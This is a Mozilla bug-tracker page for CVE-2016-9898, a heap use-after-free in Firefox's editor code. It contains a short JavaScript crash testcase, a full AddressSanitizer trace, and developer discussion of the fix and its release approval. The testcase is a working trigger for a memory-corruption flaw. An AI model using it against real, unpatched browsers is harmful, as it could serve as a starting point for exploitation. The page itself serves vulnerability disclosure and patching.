Closed
Bug 1314442
(CVE-2016-9898)
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in nsTextEditorState::SetValue
Categories
(Core :: DOM: Editor, defect)
Core
DOM: Editor
Tracking
()
People
(Reporter: nils, Assigned: smaug)
References
Details
(Keywords: csectype-uaf, reporter-external, sec-high, Whiteboard: [adv-main50.1+][adv-esr45.6+])
Attachments
(2 files)
3.42 KB,
patch
|
masayuki
:
review+
ritu
:
approval-mozilla-aurora+
ritu
:
approval-mozilla-beta+
ritu
:
approval-mozilla-release+
ritu
:
approval-mozilla-esr45+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
3.27 KB,
patch
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox (BuildID=20161101133138) as follows:
crash.html:
<script>
function start() {
o21=document.createElement('body');
o63=document.createElement('input');
document.documentElement.appendChild(o63);
document.body=o21;
o63.setSelectionRange(6,1,'forward');
document.designMode='on';
o21.addEventListener('DOMSubtreeModified',f1);
o63.value='0';
}
function f1() {
o63.type='url';
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==18411==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000855a8 at pc 0x7fb30268522f bp 0x7fff6480baf0 sp 0x7fff6480bae8
READ of size 8 at 0x60e0000855a8 thread T0 (Web Content)
#0 0x7fb30268522e in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:750:45
#1 0x7fb30268522e in nsTextEditorState::SetValue(nsAString_internal const&, unsigned int) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:2199
#2 0x7fb3024b794a in mozilla::dom::HTMLInputElement::SetValueInternal(nsAString_internal const&, unsigned int) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3267:14
#3 0x7fb3024c5851 in mozilla::dom::HTMLInputElement::SetValue(nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1994:9
#4 0x7fb301bee5a7 in mozilla::dom::HTMLInputElementBinding::set_value(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2258:3
#5 0x7fb301e5d603 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:8
#6 0x7fb3081a456c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#7 0x7fb3081a456c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
#8 0x7fb3081a6888 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
#9 0x7fb3081a6888 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:649
#10 0x7fb30820f6ee in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2419:10
#11 0x7fb30820f6ee in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2454
#12 0x7fb30817d574 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1550:12
#13 0x7fb30817d574 in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:258
#14 0x7fb30817d574 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
#15 0x7fb308169a33 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
#16 0x7fb3081a4d84 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
#17 0x7fb3081a57f2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
#18 0x7fb307c75c0d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2827:12
#19 0x7fb30188f93f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#20 0x7fb3022a9981 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#21 0x7fb3022a9981 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#22 0x7fb302275bbd in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
#23 0x7fb30227717f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#24 0x7fb3022617b6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#25 0x7fb302265883 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#26 0x7fb304427e55 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1001:7
#27 0x7fb3051aa82e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7554:5
#28 0x7fb3051a66a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7358:7
#29 0x7fb3051adbcf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7255:13
#30 0x7fb2ff2d3f40 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#31 0x7fb2ff2d2f08 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#32 0x7fb2ff2cfcbc in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#33 0x7fb2ff2d1d94 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#34 0x7fb2ff2d291c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#35 0x7fb2fd709e3b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
#36 0x7fb300284ecf in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8597:7
#37 0x7fb30031946f in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8550:5
#38 0x7fb2fd531c4b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1175:7
#39 0x7fb2fd5b21bc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#40 0x7fb2fe300a1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#41 0x7fb2fe273858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#42 0x7fb2fe273858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#43 0x7fb2fe273858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#44 0x7fb303b43daf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#45 0x7fb305cbe5a7 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:869:12
#46 0x7fb2fe273858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#47 0x7fb2fe273858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#48 0x7fb2fe273858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#49 0x7fb305cbdae3 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:7
#50 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
#51 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:392
#52 0x7fb31896c82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
#53 0x41ba08 in _start (/home/nils/MonkeyFarm/firefox/firefox+0x41ba08)
0x60e0000855a8 is located 40 bytes inside of 160-byte region [0x60e000085580,0x60e000085620)
freed by thread T0 (Web Content) here:
#0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7fb3024bde89 in operator delete /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:218:12
#2 0x7fb3024bde89 in FreeData /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1226
#3 0x7fb3024bde89 in mozilla::dom::HTMLInputElement::HandleTypeChange(unsigned char) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:5099
#4 0x7fb3024e7e2f in mozilla::dom::HTMLInputElement::ParseAttribute(int, nsIAtom*, nsAString_internal const&, nsAttrValue&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:5683:9
#5 0x7fb30005430f in mozilla::dom::Element::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:2379:8
#6 0x7fb302627233 in nsGenericHTMLElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:831:17
#7 0x7fb301bed612 in SetAttr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:487:12
#8 0x7fb301bed612 in SetAttr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:1115
#9 0x7fb301bed612 in SetHTMLAttr /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.h:961
#10 0x7fb301bed612 in SetType /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLInputElement.h:654
#11 0x7fb301bed612 in mozilla::dom::HTMLInputElementBinding::set_type(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2126
#12 0x7fb301e5d603 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:8
#13 0x7fb3081a456c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#14 0x7fb3081a456c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
#15 0x7fb3081a6888 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
#16 0x7fb3081a6888 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:649
#17 0x7fb30820f6ee in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2419:10
#18 0x7fb30820f6ee in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2454
#19 0x7fb30817d574 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1550:12
#20 0x7fb30817d574 in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:258
#21 0x7fb30817d574 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
#22 0x7fb308169a33 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
#23 0x7fb3081a4d84 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
#24 0x7fb3081a57f2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
#25 0x7fb307c75c0d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2827:12
#26 0x7fb301892e4c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#27 0x7fb302275b72 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
#28 0x7fb302275b72 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1129
#29 0x7fb30227717f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#30 0x7fb3022617b6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#31 0x7fb302265883 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#32 0x7fb302267b5d in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:777:12
#33 0x7fb300352cd1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
#34 0x7fb302200f76 in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:3
#35 0x7fb2ffe769d1 in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5194:5
#36 0x7fb303df01e2 in applyImpl<mozilla::HTMLEditRules, void (mozilla::HTMLEditRules::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
#37 0x7fb303df01e2 in apply<mozilla::HTMLEditRules, void (mozilla::HTMLEditRules::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
#38 0x7fb303df01e2 in mozilla::detail::RunnableMethodImpl<void (mozilla::HTMLEditRules::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
#39 0x7fb2ffe769d1 in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5194:5
#40 0x7fb302684bcc in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2853:5
#41 0x7fb302684bcc in nsTextEditorState::SetValue(nsAString_internal const&, unsigned int) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:2176
#42 0x7fb3024b794a in mozilla::dom::HTMLInputElement::SetValueInternal(nsAString_internal const&, unsigned int) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3267:14
#43 0x7fb3024c5851 in mozilla::dom::HTMLInputElement::SetValue(nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1994:9
#44 0x7fb301bee5a7 in mozilla::dom::HTMLInputElementBinding::set_value(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2258:3
previously allocated by thread T0 (Web Content) here:
#0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e0d6d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7fb3024b3fbf in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7fb3024b3fbf in mozilla::dom::HTMLInputElement::HTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&, mozilla::dom::FromParser, mozilla::dom::HTMLInputElement::FromClone) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1193
#4 0x7fb3024a4d5c in NS_NewHTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129:1
#5 0x7fb30264097b in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:289:41
#6 0x7fb30264097b in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:270
#7 0x7fb30039c564 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:177:12
#8 0x7fb30028026f in nsDocument::CreateElem(nsAString_internal const&, nsIAtom*, int, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8143:17
#9 0x7fb3002628c1 in nsDocument::CreateElement(nsAString_internal const&, mozilla::dom::ElementCreationOptionsOrString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5409:26
#10 0x7fb3018bb4e7 in mozilla::dom::DocumentBinding::createElement(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1010:53
#11 0x7fb301e5de10 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2857:13
#12 0x7fb3081a456c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#13 0x7fb3081a456c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
#14 0x7fb308184875 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
#15 0x7fb308184875 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#16 0x7fb308169a33 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
#17 0x7fb3081a4d84 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
#18 0x7fb3081a57f2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
#19 0x7fb307c75c0d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2827:12
#20 0x7fb30188f93f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#21 0x7fb3022a9981 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#22 0x7fb3022a9981 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#23 0x7fb302275bbd in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
#24 0x7fb30227717f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#25 0x7fb3022617b6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#26 0x7fb302265883 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#27 0x7fb304427e55 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1001:7
#28 0x7fb3051aa82e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7554:5
#29 0x7fb3051a66a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7358:7
#30 0x7fb3051adbcf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7255:13
#31 0x7fb2ff2d3f40 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#32 0x7fb2ff2d2f08 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#33 0x7fb2ff2cfcbc in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#34 0x7fb2ff2d1d94 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:750:45 in operator bool
Shadow bytes around the buggy address:
0x0c1c80008a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c80008a70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1c80008a80: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c1c80008a90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c80008aa0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
=>0x0c1c80008ab0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
0x0c1c80008ac0: fd fd fd fd fa fa fa fa fa fa fa fa 00 00 00 00
0x0c1c80008ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
0x0c1c80008ae0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1c80008af0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c1c80008b00: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==18411==ABORTING
Updated•8 years ago
|
Group: core-security → dom-core-security
Keywords: csectype-uaf,
sec-high
Assignee | ||
Updated•8 years ago
|
Assignee: nobody → bugs
Assignee | ||
Comment 1•8 years ago
|
||
This was after all an editor bug, not nsTextEditorState.
Editor shouldn't observe changes happening in (native) anonymous subtrees, if they aren't rooted to such tree.
Attachment #8807693 -
Flags: review?(masayuki)
Comment 2•8 years ago
|
||
Comment on attachment 8807693 [details] [diff] [review]
nac_editors.diff
>+bool
>+HTMLEditor::IsInObservedSubtree(nsIDocument* aDocument,
>+ nsIContent* aContainer,
>+ nsIContent* aChild)
>+{
>+ if (!aChild) {
>+ return false;
>+ }
>+
>+ Element* root = GetRoot();
>+ // To be super safe here, check both ChromeOnlyAccess and GetBindingParent.
>+ // That catches (also unbound) native anonymous content, XBL and ShadowDOM.
>+ if (root &&
Hmm, although, root should be always non-nullptr, if it's non-nullptr, this method should return false or crash for detecting a bug. But this is not a scope of this bug, up to you.
And different document such as contentDocument of iframe in a designMode document isn't editable. So, this must work as expected.
I wonder, who expects that mutant observer runs when its subtree is changed? It might be necessary to make the other observers check this first, e.g., IMEContentObserver.
Attachment #8807693 -
Flags: review?(masayuki) → review+
Assignee | ||
Comment 3•8 years ago
|
||
Root may be null, I think, if documentElement has been removed from document.
IMEContentObserver doesn't end up modifying DOM, so at least this kind of crash shouldn't be possible there. But could you check if something should be fixed there and file a bug?
Flags: needinfo?(masayuki)
Assignee | ||
Comment 4•8 years ago
|
||
Comment on attachment 8807693 [details] [diff] [review]
nac_editors.diff
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
I would say more than trivial.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be: "bug 1314442, limit editor's editability to the right subtree, r=masayuki"
Which older supported branches are affected by this flaw?
all
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
looks like esr45 needs a separate patch because of some file renames.
How likely is this patch to cause regressions; how much testing does it need?
Should be relatively safe.
String or UUID changes made by this patch:
NA
Attachment #8807693 -
Flags: sec-approval?
Attachment #8807693 -
Flags: approval-mozilla-esr45?
Attachment #8807693 -
Flags: approval-mozilla-beta?
Attachment #8807693 -
Flags: approval-mozilla-aurora?
Assignee | ||
Comment 5•8 years ago
|
||
Comment 6•8 years ago
|
||
(In reply to Olli Pettay [:smaug] from comment #3)
> Root may be null, I think, if documentElement has been removed from document.
If it may be nullptr, I think that early return is better. But it's okay you take either since it's not major problem anyway (it's more important to uplift as far as safer).
> IMEContentObserver doesn't end up modifying DOM, so at least this kind of
> crash shouldn't be possible there. But could you check if something should
> be fixed there and file a bug?
Yeah, IMEContentObserver is really sensitive for performance. I'll investigate it when I have much time to do that.
Flags: needinfo?(masayuki)
status-firefox50:
--- → affected
status-firefox51:
--- → affected
Comment 7•8 years ago
|
||
